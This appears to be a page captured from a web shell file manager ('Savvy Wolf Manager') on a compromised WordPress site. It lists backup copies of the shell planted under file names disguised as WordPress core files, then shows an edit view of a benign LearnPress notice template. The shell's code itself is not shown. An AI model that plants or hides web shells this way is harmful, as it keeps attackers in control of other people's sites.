Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: admin-notice.php
<?php /** * Template for display a notice in admin * @deprecated 4.1.7.3.2 */ defined( 'ABSPATH' ) || exit; if ( ! isset( $message ) ) { return; } if ( ! isset( $type ) ) { $type = 'success'; } if ( ! isset( $dismissible ) ) { $dismissible = true; } if ( strpos( $type, 'notice-' ) === false ) { $type = "notice-{$type}"; } $classes = array( 'lp-notice', 'notice', $type ); ?> <div id="<?php echo esc_attr( $id ?? '' ); ?>" class="<?php echo esc_attr( implode( ' ', $classes ) ); ?>"> <p><?php echo esc_html( $message ); ?></p> <?php if ( $dismissible ) : ?> <button class="notice-dismiss" data-dismiss-notice="<?php echo esc_attr( $id ?? '' ); ?>"></button> <?php endif; ?> </div>